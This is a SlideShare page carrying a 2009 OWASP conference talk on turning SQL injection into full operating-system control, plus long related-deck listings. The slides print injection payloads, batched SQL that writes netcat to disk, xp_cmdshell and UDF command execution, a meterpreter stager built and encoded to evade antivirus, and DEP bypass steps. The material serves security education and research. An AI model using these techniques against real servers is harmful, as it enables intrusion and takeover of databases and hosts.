SlideShare ist ein Scribd-Unternehmen logo

Advanced SQL injection to operating system full control (short version)

Bernardo Damele A. G.
Bernardo Damele A. G.

Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet. These slides have been presented at OWASP AppSec Europe 2009 conference in Krakow on May 13, 2009. Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.

Technologie
1 von 39
Downloaden Sie, um offline zu lesen
Advanced SQL injection to operating system full control Bernardo Damele A. G. IT Security Engineer bernardo.damele@gmail.com +44 7788962949 Copyright © Bernardo Damele Assumpcao Guimaraes Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License. The OWASP Foundation http://www.owasp.org
SQL injection definition SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements It is a common threat in web applications that lack of proper sanitization on user- supplied input used in SQL queries It does not affect only web applications! OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 2
SQL injection techniques Boolean based blind SQL injection: par=1 AND ORD(MID((SQL query), Nth char, 1)) > Bisection num-- UNION query (inband) SQL injection: par=1 UNION ALL SELECT query-- Batched queries SQL injection: par=1; SQL query;-- OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 3
How far can an attacker go by exploiting a SQL injection? OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 4
Scope of the analysis Three database software: MySQL on Windows PostgreSQL on Windows and Linux Microsoft SQL Server on Windows Three web application languages: ASP on Microsoft IIS, Windows ASP.NET on Microsoft IIS, Windows PHP on Apache and Microsoft IIS OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 5
Batched queries In SQL, batched queries are multiple SQL statements, separated by a semicolon, and passed to the database Example: SELECT col FROM table1 WHERE id=1; DROP table2; OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 6
Batched queries support ASP ASP.NET PHP MySQL No Yes No PostgreSQL Yes Yes Yes Microsoft SQL Server Yes Yes Yes Programming languages and their DBMS connectors default support for batched queries OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 7
File system write access OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 8
File write access on MySQL On the attacker box: Encode the local file content to its corresponding hexadecimal string Split the hexadecimal encoded string into chunks long 1024 characters each OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 9
File write access on MySQL Via batched queries SQL injection technique: CREATE TABLE footable(data longblob); INSERT INTO footable(data) VALUES (0x4d5a90…610000); UPDATE footable SET data=CONCAT(data, 0xaa270000…000000); […]; SELECT data FROM footable INTO DUMPFILE 'C:/WINDOWS/Temp/nc.exe'; OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 10
File write access on PostgreSQL On the attacker box: Encode the local file content to its corresponding base64 string Split the base64 encoded string into chunks long 1024 characters each OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 11
File write access on PostgreSQL Via batched queries SQL injection technique: CREATE TABLE footable(data text); INSERT INTO footable(data) VALUES ('TVqQ…'); UPDATE footable SET data=data||'U8pp…vgDw'; […] SELECT lo_create(47); UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM footable), 'base64')) WHERE loid=47; SELECT lo_export(47, 'C:/WINDOWS/Temp/nc.exe'); OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 12
File write access on MS SQL Server Microsoft SQL Server can execute commands: xp_cmdshell() EXEC xp_cmdshell('echo … >> filepath') Session user must have CONTROL SERVER privilege On the attacker box: Split the file in chunks of 64Kb Convert each chunk to its plain text debug script format OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 13
File write access on MS SQL Server Example of nc.exe: 00000000 4D 5A 90 00 03 00 00 00 00000008 04 00 00 00 FF FF 00 00 […] As a plain text debug script: n qqlbc // Create a temporary file rcx // Write the file size in f000 // the CX registry f 0100 f000 00 // Fill the segment with 0x00 e 100 4d 5a 90 00 03 […] // Write in memory all values e 114 00 00 00 00 40 […] […] w // Write the file to disk q // Quit debug.exe OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 14
File write access on MS SQL Server Via batched queries SQL injection technique: For each debug script: EXEC master..xp_cmdshell ' echo n qqlbc >> C:WINDOWSTempzdfiq.scr & echo rcx >> C:WINDOWSTempzdfiq.scr & echo f000 >> C:WINDOWSTempzdfiq.scr & echo f 0100 f000 00 >> C:WINDOWSTempzdfiq.scr & […]' OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 15
File write access on MS SQL Server EXEC master..xp_cmdshell ' cd C:WINDOWSTemp & debug < C:WINDOWSTempzdfiq.scr & del /F C:WINDOWSTempzdfiq.scr & copy /B /Y netcat+qqlbc netcat' EXEC master..xp_cmdshell ' cd C:WINDOWSTemp & move /Y netcat C:/WINDOWS/Temp/nc.exe' OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 16
Operating system access OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 17
User-Defined Function In SQL, a user-defined function is a custom function that can be evaluated in SQL statements UDF can be created from shared libraries that are compiled binary files Dynamic-link library on Windows Shared object on Linux OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 18
UDF injection On the attacker box: Compile a shared library defining two UDF: sys_eval(cmd): executes cmd, returns stdout sys_exec(cmd): executes cmd, returns status The shared library can also be packed to speed up the upload via SQL injection: Windows: UPX for the dynamic-link library Linux: strip for the shared object OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 19
UDF injection Via batched queries SQL injection technique: Upload the shared library to the DBMS file system Create the two UDF from the shared library Call either of the UDF to execute commands OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 20
UDF injection on MySQL UDF Repository for MySQL lib_mysqludf_sys shared library: Approximately 6Kb packed Added sys_eval() to return command standard output Compliant with MySQL 5.0+ Works on all versions of MySQL from 4.1.0 Compatible with both Windows or Linux OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 21
UDF injection on MySQL Via batched queries SQL injection technique: Fingerprint MySQL version Upload the shared library to a file system path where the MySQL looks for them CREATE FUNCTION sys_exec RETURNS int SONAME 'libudffmwgj.dll'; CREATE FUNCTION sys_eval RETURNS string SONAME 'libudffmwgj.dll'; OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 22
UDF injection on PostgreSQL Ported MySQL shared library to PostgreSQL lib_postgresqludf_sys shared library: Approximately 6Kb packed C-Language Functions: sys_eval() and sys_exec() Compliant with PostgreSQL 8.2+ magic block Works on all versions of PostgreSQL from 8.0 Compatible with both Windows or Linux OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 23
UDF injection on PostgreSQL Via batched queries SQL injection technique: Fingerprint PostgreSQL version Upload the shared library to any file system path where PostgreSQL has rw access CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'libudflenpx.dll', 'sys_exec' LANGUAGE C […]; CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'libudflenpx.dll', 'sys_eval' LANGUAGE C […]; OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 24
Command execution on MS SQL Server xp_cmdshell() stored procedure: Session user must have sysadmin role or be specified as a proxy account Enabled by default on MS SQL Server 2000 or re-enabled via sp_addextendedproc OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 25
Command execution on MS SQL Server Disabled by default on MS SQL Server 2005 and 2008, it can be: Re-enabled via sp_configure Created from scratch using shell object OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 26
Out-of-band connection OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 27
OOB connection definition Contrary to in-band connections (HTTP), it uses an alternative channel to return data This concept can be extended to establish a full- duplex connection between the attacker host and the database server Over this channel the attacker can have a command prompt or a graphical access (VNC) to the DBMS server OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 28
A good friend: Metasploit Metasploit is a powerful open source exploitation framework Post-exploitation in a SQL injection scenario SQL injection as a stepping stone for OOB channel using Metasploit can be achieved Requires file system write access and command execution via in-band connection – already achieved OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 29
OOB via payload stager On the attacker box: Forge a stand-alone payload stager with msfpayload Encode it with msfencode to bypass AV Pack it with UPX to speed up the upload via SQL injection if the target OS is Windows OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 30
OOB via payload stager Example of payload stager creation and encode: $ msfpayload windows/meterpreter/bind_tcp EXITFUNC=process LPORT=31486 R | msfencode –e x86/shikata_ga_nai -t exe -o stagerbvdcp.exe Payload stager compression: $ upx -9 –qq stagerbvdcp.exe The payload stager size is 9728 bytes, as a compressed executable its size is 2560 bytes OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 31
OOB via payload stager On the attacker box: Run msfcli with multi/handler exploit Via batched queries SQL injection technique: Upload the stand-alone payload stager to the file system temporary folder of the DBMS Execute it via sys_exec() or xp_cmdshell() OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 32
Stored procedure buffer overflow Discovered by Bernhard Mueller on December 4, 2008 sp_replwritetovarbin heap-based buffer overflow on Microsoft SQL Server 2000 SP4 and Microsoft SQL Server 2005 SP2 Patched by Microsoft on February 10, 2009 – MS09-004 OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 33
Buffer overflow exploit Session user needs only EXECUTE privilege on the stored procedure – default Guido Landi wrote the first public stand- alone exploit for this vulnerability I added support for multi-stage payload and integrated it in sqlmap OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 34
Data Execution Prevention DEP is a security feature that prevents code execution in memory pages not marked as executable It can be configured to allow exceptions Default settings allow exceptions: Windows 2003 SP1+: OptOut Windows 2008 SP0+: OptOut OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 35
Bypass DEP When it is set to OptOut: Exception for sqlservr.exe in the registry Via bat file by calling reg Via reg file by passing it to regedit Via master..xp_regwrite Upload and execute a bat file which executes sc to restart the process OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 36
Credits Guido Landi Alberto Revelli Alessandro Tanasi Metasploit development team More acknowledgments and references on the white paper, http://tinyurl.com/sqlmap1 OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 37
Questions? OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 38
Thanks for your attention! Bernardo Damele Assumpção Guimarães bernardo.damele@gmail.com http://bernardodamele.blogspot.com http://sqlmap.sourceforge.net OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 39

Empfohlen

Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Bernardo Damele A. G.
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!Bernardo Damele A. G.
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
Sql Injection 0wning Enterprise
Sql Injection 0wning EnterpriseSql Injection 0wning Enterprise
Sql Injection 0wning Enterprisen|u - The Open Security Community
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internalsBernardo Damele A. G.
 

Empfohlen

Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Advanced SQL injection to operating system full control (short version)
Advanced SQL injection to operating system full control (short version)Bernardo Damele A. G.
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!Bernardo Damele A. G.
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
Sql Injection 0wning Enterprise
Sql Injection 0wning EnterpriseSql Injection 0wning Enterprise
Sql Injection 0wning Enterprisen|u - The Open Security Community
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internalsBernardo Damele A. G.
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Sqlmap
SqlmapSqlmap
SqlmapInstitute of Information Security (IIS)
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
Sqlmap
SqlmapSqlmap
SqlmapRushikesh Kulkarni
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
Sqlmap
SqlmapSqlmap
Sqlmapshamshad9
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbgArno Huetter
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish fileyukta888
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1Bernardo Damele A. G.
 
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASEnable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASInvenire Aude
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Data Tracking: On the Hunt for Information about Your Database
Data Tracking: On the Hunt for Information about Your DatabaseData Tracking: On the Hunt for Information about Your Database
Data Tracking: On the Hunt for Information about Your DatabaseMichael Rosenblum
 
Sql injection
Sql injectionSql injection
Sql injectionNuruzzaman Milon
 
Securing your web applications a pragmatic approach
Securing your web applications a pragmatic approachSecuring your web applications a pragmatic approach
Securing your web applications a pragmatic approachAntonio Parata
 

Weitere ähnliche Inhalte

Was ist angesagt?

Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbgArno Huetter
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish fileyukta888
 
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASEnable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASInvenire Aude
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Data Tracking: On the Hunt for Information about Your Database
Data Tracking: On the Hunt for Information about Your DatabaseData Tracking: On the Hunt for Information about Your Database
Data Tracking: On the Hunt for Information about Your DatabaseMichael Rosenblum
 

Was ist angesagt? (20)

Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in Python
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmap
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads Up
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection Attacks
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbg
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish file
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASEnable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IAS
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Data Tracking: On the Hunt for Information about Your Database
Data Tracking: On the Hunt for Information about Your DatabaseData Tracking: On the Hunt for Information about Your Database
Data Tracking: On the Hunt for Information about Your Database
 

Andere mochten auch

Securing your web applications a pragmatic approach
Securing your web applications a pragmatic approachSecuring your web applications a pragmatic approach
Securing your web applications a pragmatic approachAntonio Parata
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisAntonio Parata
 
NCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group 44Con Workshop: How to assess and secure ios appsNCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group 44Con Workshop: How to assess and secure ios appsNCC Group
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
EyePyramid and other .NET malware. How to analyze them?
EyePyramid and other .NET malware. How to analyze them?EyePyramid and other .NET malware. How to analyze them?
EyePyramid and other .NET malware. How to analyze them?Antonio Parata
 

Andere mochten auch (7)

Sql injection
Sql injectionSql injection
Sql injection
 
Securing your web applications a pragmatic approach
Securing your web applications a pragmatic approachSecuring your web applications a pragmatic approach
Securing your web applications a pragmatic approach
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
 
NCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group 44Con Workshop: How to assess and secure ios appsNCC Group 44Con Workshop: How to assess and secure ios apps
NCC Group 44Con Workshop: How to assess and secure ios apps
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
EyePyramid and other .NET malware. How to analyze them?
EyePyramid and other .NET malware. How to analyze them?EyePyramid and other .NET malware. How to analyze them?
EyePyramid and other .NET malware. How to analyze them?
 

Ähnlich wie Advanced SQL injection to operating system full control (short version)

Dynamic Slides using OpenOffice.org Impress and Python
Dynamic Slides using OpenOffice.org Impress and PythonDynamic Slides using OpenOffice.org Impress and Python
Dynamic Slides using OpenOffice.org Impress and PythonCarles Pina Estany
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300KOI Lastone
 
BKK16-409 VOSY Switch Port to ARMv8 Platforms and ODP Integration
BKK16-409 VOSY Switch Port to ARMv8 Platforms and ODP IntegrationBKK16-409 VOSY Switch Port to ARMv8 Platforms and ODP Integration
BKK16-409 VOSY Switch Port to ARMv8 Platforms and ODP IntegrationLinaro
 
load-testing-with-k6-nakov-at-qa-challenge-accepted-oct-2021-211002181104.pdf
load-testing-with-k6-nakov-at-qa-challenge-accepted-oct-2021-211002181104.pdfload-testing-with-k6-nakov-at-qa-challenge-accepted-oct-2021-211002181104.pdf
load-testing-with-k6-nakov-at-qa-challenge-accepted-oct-2021-211002181104.pdfobuleshuppara
 
Load Testing with k6 framework
Load Testing with k6 frameworkLoad Testing with k6 framework
Load Testing with k6 frameworkSvetlin Nakov
 
Pilot Study - WSO2 Enterprise Integrator v6.1.1
Pilot Study - WSO2 Enterprise Integrator v6.1.1Pilot Study - WSO2 Enterprise Integrator v6.1.1
Pilot Study - WSO2 Enterprise Integrator v6.1.1GaneshNagalingam1
 
Eclipsecon 2017 presentation
Eclipsecon 2017 presentationEclipsecon 2017 presentation
Eclipsecon 2017 presentationKynetics
 
NodeJS guide for beginners
NodeJS guide for beginnersNodeJS guide for beginners
NodeJS guide for beginnersEnoch Joshua
 
Java 6 [Mustang] - Features and Enchantments
Java 6 [Mustang] - Features and Enchantments Java 6 [Mustang] - Features and Enchantments
Java 6 [Mustang] - Features and Enchantments Pavel Kaminsky
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)Ferruh Mavituna
 
MM-4097, OpenCV-CL, by Harris Gasparakis, Vadim Pisarevsky and Andrey Pavlenko
MM-4097, OpenCV-CL, by Harris Gasparakis, Vadim Pisarevsky and Andrey PavlenkoMM-4097, OpenCV-CL, by Harris Gasparakis, Vadim Pisarevsky and Andrey Pavlenko
MM-4097, OpenCV-CL, by Harris Gasparakis, Vadim Pisarevsky and Andrey PavlenkoAMD Developer Central
 
Anton Moldovan "Building an efficient replication system for thousands of ter...
Anton Moldovan "Building an efficient replication system for thousands of ter...Anton Moldovan "Building an efficient replication system for thousands of ter...
Anton Moldovan "Building an efficient replication system for thousands of ter...Fwdays
 
WIndows Embedded Compact 2013 – What’s news
WIndows Embedded Compact 2013 – What’s newsWIndows Embedded Compact 2013 – What’s news
WIndows Embedded Compact 2013 – What’s newsMirco Vanini
 
You're Off the Hook: Blinding Security Software
You're Off the Hook: Blinding Security SoftwareYou're Off the Hook: Blinding Security Software
You're Off the Hook: Blinding Security SoftwareCylance
 
Direct Code Execution - LinuxCon Japan 2014
Direct Code Execution - LinuxCon Japan 2014Direct Code Execution - LinuxCon Japan 2014
Direct Code Execution - LinuxCon Japan 2014Hajime Tazaki
 

Ähnlich wie Advanced SQL injection to operating system full control (short version) (20)

SQL Server on Linux
SQL Server on LinuxSQL Server on Linux
SQL Server on Linux
 
Dynamic Slides using OpenOffice.org Impress and Python
Dynamic Slides using OpenOffice.org Impress and PythonDynamic Slides using OpenOffice.org Impress and Python
Dynamic Slides using OpenOffice.org Impress and Python
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300
 
Sql injection exploit
Sql injection exploitSql injection exploit
Sql injection exploit
 
BKK16-409 VOSY Switch Port to ARMv8 Platforms and ODP Integration
BKK16-409 VOSY Switch Port to ARMv8 Platforms and ODP IntegrationBKK16-409 VOSY Switch Port to ARMv8 Platforms and ODP Integration
BKK16-409 VOSY Switch Port to ARMv8 Platforms and ODP Integration
 
load-testing-with-k6-nakov-at-qa-challenge-accepted-oct-2021-211002181104.pdf
load-testing-with-k6-nakov-at-qa-challenge-accepted-oct-2021-211002181104.pdfload-testing-with-k6-nakov-at-qa-challenge-accepted-oct-2021-211002181104.pdf
load-testing-with-k6-nakov-at-qa-challenge-accepted-oct-2021-211002181104.pdf
 
Load Testing with k6 framework
Load Testing with k6 frameworkLoad Testing with k6 framework
Load Testing with k6 framework
 
Session11 Ucc Intro
Session11 Ucc IntroSession11 Ucc Intro
Session11 Ucc Intro
 
Pilot Study - WSO2 Enterprise Integrator v6.1.1
Pilot Study - WSO2 Enterprise Integrator v6.1.1Pilot Study - WSO2 Enterprise Integrator v6.1.1
Pilot Study - WSO2 Enterprise Integrator v6.1.1
 
Eclipsecon 2017 presentation
Eclipsecon 2017 presentationEclipsecon 2017 presentation
Eclipsecon 2017 presentation
 
NodeJS guide for beginners
NodeJS guide for beginnersNodeJS guide for beginners
NodeJS guide for beginners
 
Handout2o
Handout2oHandout2o
Handout2o
 
Java 6 [Mustang] - Features and Enchantments
Java 6 [Mustang] - Features and Enchantments Java 6 [Mustang] - Features and Enchantments
Java 6 [Mustang] - Features and Enchantments
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)
 
MM-4097, OpenCV-CL, by Harris Gasparakis, Vadim Pisarevsky and Andrey Pavlenko
MM-4097, OpenCV-CL, by Harris Gasparakis, Vadim Pisarevsky and Andrey PavlenkoMM-4097, OpenCV-CL, by Harris Gasparakis, Vadim Pisarevsky and Andrey Pavlenko
MM-4097, OpenCV-CL, by Harris Gasparakis, Vadim Pisarevsky and Andrey Pavlenko
 
Anton Moldovan "Building an efficient replication system for thousands of ter...
Anton Moldovan "Building an efficient replication system for thousands of ter...Anton Moldovan "Building an efficient replication system for thousands of ter...
Anton Moldovan "Building an efficient replication system for thousands of ter...
 
WIndows Embedded Compact 2013 – What’s news
WIndows Embedded Compact 2013 – What’s newsWIndows Embedded Compact 2013 – What’s news
WIndows Embedded Compact 2013 – What’s news
 
You're Off the Hook: Blinding Security Software
You're Off the Hook: Blinding Security SoftwareYou're Off the Hook: Blinding Security Software
You're Off the Hook: Blinding Security Software
 
Direct Code Execution - LinuxCon Japan 2014
